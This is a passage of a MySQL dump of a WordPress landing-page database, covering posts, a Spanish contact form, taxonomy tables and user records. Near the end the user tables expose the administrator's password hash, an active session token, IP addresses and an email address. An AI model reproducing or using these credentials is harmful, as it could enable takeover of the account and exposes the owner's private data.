12:18:26','',92,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/pseguros2-1-2.png',0,'attachment','image/png',0),(94,1,'2022-09-27 12:18:56','2022-09-27 12:18:56','','SanCristobal','','publish','closed','closed','','sancristobal','','','2022-09-27 12:18:56','2022-09-27 12:18:56','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=94',0,'sp_logo_carousel','',0),(95,1,'2022-09-27 12:18:47','2022-09-27 12:18:47','','san cristobal seguros (2)','','inherit','open','closed','','san-cristobal-seguros-2','','','2022-09-27 12:18:47','2022-09-27 12:18:47','',94,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/san-cristobal-seguros-2.png',0,'attachment','image/png',0),(96,1,'2022-09-27 12:19:16','2022-09-27 12:19:16','','SancorSalud','','publish','closed','closed','','sancorsalud','','','2022-09-27 12:19:16','2022-09-27 12:19:16','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=96',0,'sp_logo_carousel','',0),(97,1,'2022-09-27 12:19:08','2022-09-27 12:19:08','','sancor salud (2)','','inherit','open','closed','','sancor-salud-2','','','2022-09-27 12:19:08','2022-09-27 12:19:08','',96,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/sancor-salud-2.png',0,'attachment','image/png',0),(98,1,'2022-09-27 12:19:35','2022-09-27 12:19:35','','TotalSupport','','publish','closed','closed','','totalsupport','','','2022-09-27 12:19:35','2022-09-27 12:19:35','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=98',0,'sp_logo_carousel','',0),(99,1,'2022-09-27 12:19:28','2022-09-27 12:19:28','','total support (2)','','inherit','open','closed','','total-support-2','','','2022-09-27 12:19:28','2022-09-27 12:19:28','',98,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/total-support-2.png',0,'attachment','image/png',0),(100,1,'2022-09-27 12:26:58','2022-09-27 12:26:58','','Home','','publish','closed','closed','','home','','','2022-09-27 13:09:28','2022-09-27 13:09:28','',0,'https://mktinsiders.com/landing2022/wp/?page_id=100',0,'page','',0),(101,1,'2022-09-27 12:26:58','2022-09-27 12:26:58','','Home','','inherit','closed','closed','','100-revision-v1','','','2022-09-27 12:26:58','2022-09-27 12:26:58','',100,'https://mktinsiders.com/landing2022/wp/?p=101',0,'revision','',0),(102,1,'2022-09-27 13:44:07','2022-09-27 13:44:07','','Clientes','','publish','closed','closed','','nueva-presentacion-de-diapositivas','','','2022-09-27 13:44:22','2022-09-27 13:44:22','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slider&#038;p=102',0,'ml-slider','',0),(103,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=103',0,'ml-slide','',0),(104,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-2','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=104',1,'ml-slide','',0),(105,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-3','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=105',2,'ml-slide','',0),(106,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-4','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=106',3,'ml-slide','',0),(107,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-5','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=107',4,'ml-slide','',0),(108,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-6','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=108',5,'ml-slide','',0),(109,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-7','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=109',6,'ml-slide','',0),(110,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-8','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=110',7,'ml-slide','',0),(111,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-9','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=111',8,'ml-slide','',0),(112,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-10','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=112',9,'ml-slide','',0),(113,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-11','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=113',10,'ml-slide','',0),(114,1,'2022-09-27 13:44:32','2022-09-27 13:44:32','','Slider 102 - image','','publish','closed','closed','','slider-102-image-12','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=114',11,'ml-slide','',0),(115,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-13','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=115',12,'ml-slide','',0),(116,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-14','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=116',13,'ml-slide','',0),(117,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-15','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=117',14,'ml-slide','',0),(118,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-16','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=118',15,'ml-slide','',0),(119,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-17','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=119',16,'ml-slide','',0),(120,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-18','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=120',17,'ml-slide','',0),(121,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-19','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=121',18,'ml-slide','',0),(122,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-20','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=122',19,'ml-slide','',0),(123,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-21','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=123',20,'ml-slide','',0),(124,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-22','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=124',21,'ml-slide','',0),(125,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-23','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=125',22,'ml-slide','',0),(126,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-24','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=126',23,'ml-slide','',0),(127,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-25','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=127',24,'ml-slide','',0),(128,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-26','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=128',25,'ml-slide','',0),(129,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-27','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=129',26,'ml-slide','',0),(130,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-28','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=130',27,'ml-slide','',0),(131,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-29','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=131',28,'ml-slide','',0),(132,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-30','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=132',29,'ml-slide','',0),(133,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-31','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=133',30,'ml-slide','',0),(134,1,'2022-09-27 13:44:33','2022-09-27 13:44:33','','Slider 102 - image','','publish','closed','closed','','slider-102-image-32','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=134',31,'ml-slide','',0),(135,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-33','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=135',32,'ml-slide','',0),(136,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-34','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=136',33,'ml-slide','',0),(137,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-35','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=137',34,'ml-slide','',0),(138,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-36','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=138',35,'ml-slide','',0),(139,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-37','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=139',36,'ml-slide','',0),(140,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-38','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=140',37,'ml-slide','',0),(141,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-39','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=141',38,'ml-slide','',0),(142,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-40','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=142',39,'ml-slide','',0),(143,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-41','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=143',40,'ml-slide','',0),(144,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-42','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=144',41,'ml-slide','',0),(145,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-43','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=145',42,'ml-slide','',0),(146,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-44','','','2022-09-27 13:52:27','2022-09-27 13:52:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=146',43,'ml-slide','',0),(147,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-45','','','2022-09-27 13:52:28','2022-09-27 13:52:28','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=147',44,'ml-slide','',0),(148,1,'2022-09-27 13:44:34','2022-09-27 13:44:34','','Slider 102 - image','','publish','closed','closed','','slider-102-image-46','','','2022-09-27 13:52:28','2022-09-27 13:52:28','',0,'https://mktinsiders.com/landing2022/wp/?post_type=ml-slide&#038;p=148',45,'ml-slide','',0),(149,1,'2022-09-27 14:01:45','2022-09-27 14:01:45','','Clientes','','publish','closed','closed','','clientes','','','2022-09-27 14:04:15','2022-09-27 14:04:15','',0,'https://mktinsiders.com/landing2022/wp/?carousels=clientes',0,'carousels','',0),(150,1,'2022-09-27 14:26:58','2022-09-27 14:26:58','<div class=\"container\">\r\n<div class=\"col-md-4 fill-cont\">\r\n<label> DNI*\r\n[text* dni class:form-control] </label>\r\n</div>\r\n<div class=\"col-md-4 fill-cont\">\r\n<label> Nombre y Apellido*\r\n[text* nomape class:form-control] </label>\r\n</div>\r\n<div class=\"col-md-4 fill-cont\">\r\n<label> Nombre de empresa*\r\n[text* empresa class:form-control] </label>\r\n</div>\r\n<div class=\"col-md-4 fill-cont\">\r\n<label> CUIT*\r\n[text* cuit class:form-control] </label>\r\n</div>\r\n<div class=\"col-md-4 fill-cont\">\r\n<label> Cargo*\r\n[select* cargo class:form-control \"Socio Gerente\" \"Presidente\" \"Encargado de marketing\" \"Encargado\" \"Responsable\" \"Administrativo\" \"Titular\" \"Empleado\" \"Recursos humanos\" \"Departamento IT\"]</label>\r\n</div>\r\n<div class=\"col-md-4 fill-cont\">\r\n<label> E-mail*\r\n[email* email class:form-control]</label>\r\n</div>\r\n<div class=\"col-md-4 fill-cont\">\r\n<label> Teléfono*\r\n[text* telefono class:form-control]</label>\r\n</div>\r\n<div class=\"col-md-4 fill-cont\">\r\n<label> Módulo de interés*\r\n[select* interes class:form-control \"Enriquecimiento de datos\" \"Segmentación y armado de bases\" \"Email marketing\" \"DB de email váilidos\" \"Smartleads\" \"Inteligencia artificial\" \"Modelo de score crediticio\" \"Inteligencia comercial\" \"Reportes crediticios\"]\r\n</div>\r\n<div class=\"col-md-4 fill-cont\">\r\n[acceptance acceptance-947] ACEPTO LA POLÍTICA DE PRIVACIDAD Y TÉRMINOS Y CONDICIONES [/acceptance]\r\n</div>\r\n<div class=\"col-md-12 fill-cont\">\r\n[submit \"Enviar\"]\r\n</div>\r\n</div>\n1\nConsulta vía web\n[_site_title] <wordpress@mktinsiders.com>\ncontacto@mktinsiders.com\n<strong>DNI:</strong> [dni]\r\n<strong>Nombre y Apellido:</strong> [nomape] \r\n<strong>Empresa:</strong> [empresa]\r\n<strong>CUIT:</strong> [cuit]\r\n<strong>Cargo:</strong> [cargo]\r\n<strong>E-mail:</strong> [email]\r\n<strong>Teléfono:</strong> [telefono]\r\n<strong>Módulo de Interés:</strong> [interes]\r\n\r\n-- \r\nEste mensaje se ha enviado desde un formulario de contacto en [_site_title] ([_site_url])\nReply-To: [email]\n\n1\n\n\n[_site_title] «[your-subject]»\n[_site_title] <wordpress@mktinsiders.com>\n[your-email]\nCuerpo del mensaje:\r\n[your-message]\r\n\r\n-- \r\nEste mensaje se ha enviado desde un formulario de contacto en [_site_title] ([_site_url])\nReply-To: [_site_admin_email]\n\n\n\nGracias por completar el formulario, tu mensaje ha sido enviado.\nHa ocurrido un error al intentar enviar tu mensaje. Por favor, inténtalo de nuevo más tarde.\nUno o más campos tienen un error. Por favor, revísalos e inténtalo de nuevo.\nHa ocurrido un error al intentar enviar tu mensaje. Por favor, inténtalo de nuevo más tarde.\nDebes aceptar los términos y condiciones antes de enviar tu mensaje.\nPor favor, rellena este campo.\nEste campo tiene una entrada demasiado larga.\nEste campo tiene una entrada demasiado corta.\nHa ocurrido un error desconocido al subir el archivo.\nNo tienes permisos para subir archivos de este tipo.\nEl archivo subido es demasiado grande.\nHa ocurrido un error al subir el archivo.\nPor favor, introduce una fecha con el formato YYYY-MM-DD.\nEste campo tiene una fecha demasiado temprana.\nEste campo tiene una fecha demasiado tardía.\nPor favor, introduce un número.\nEste campo tiene un número demasiado pequeño.\nEste campo tiene un número demasiado grande.\nLa respuesta al cuestionario no es correcta.\nPor favor, introduce una dirección de correo electrónico.\nPor favor, introduce una URL.\nPor favor, introduce un número de teléfono.','Formulario de contacto 1','','publish','closed','closed','','formulario-de-contacto-1','','','2022-09-30 17:09:05','2022-09-30 17:09:05','',0,'https://mktinsiders.com/landing2022/wp/?post_type=wpcf7_contact_form&#038;p=150',0,'wpcf7_contact_form','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` (`object_id`, `term_taxonomy_id`, `term_order`) VALUES (1,1,0),(38,2,0),(103,3,0),(104,3,0),(105,3,0),(106,3,0),(107,3,0),(108,3,0),(109,3,0),(110,3,0),(111,3,0),(112,3,0),(113,3,0),(114,3,0),(115,3,0),(116,3,0),(117,3,0),(118,3,0),(119,3,0),(120,3,0),(121,3,0),(122,3,0),(123,3,0),(124,3,0),(125,3,0),(126,3,0),(127,3,0),(128,3,0),(129,3,0),(130,3,0),(131,3,0),(132,3,0),(133,3,0),(134,3,0),(135,3,0),(136,3,0),(137,3,0),(138,3,0),(139,3,0),(140,3,0),(141,3,0),(142,3,0),(143,3,0),(144,3,0),(145,3,0),(146,3,0),(147,3,0),(148,3,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` (`term_taxonomy_id`, `term_id`, `taxonomy`, `description`, `parent`, `count`) VALUES (1,1,'category','',0,1),(2,2,'wp_theme','',0,1),(3,3,'ml-slider','',0,46);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` (`term_id`, `name`, `slug`, `term_group`) VALUES (1,'Sin categoría','sin-categoria',0),(2,'twentytwentytwo','twentytwentytwo',0),(3,'102','102',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=22 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (1,1,'nickname','brote'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wp_user_level','10'),(14,1,'dismissed_wp_pointers',''),(15,1,'show_welcome_panel','1'),(16,1,'session_tokens','a:1:{s:64:\"c660be514ab19f555b5078803628f545b2812ae438ae14aff42cb2589a264f25\";a:4:{s:10:\"expiration\";i:1664721594;s:2:\"ip\";s:13:\"172.70.54.172\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\";s:5:\"login\";i:1664548794;}}'),(17,1,'wp_dashboard_quick_press_last_post_id','4'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:12:\"45.231.218.0\";}'),(19,1,'wp_user-settings','libraryContent=browse'),(20,1,'wp_user-settings-time','1664212751'),(21,1,'wp_metaslider_analytics_onboarding_status','no');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (1,'brote','$P$BUXm8ePKd2Dn/GwmfHSIRUHHRFSEFc0','brote','wp@brotead.com','https://mktinsiders.com/landing2022/wp','2022-09-26 17:16:52','',0,'brote');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Dumping routines for database 'mktinsiders_landing'
--
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
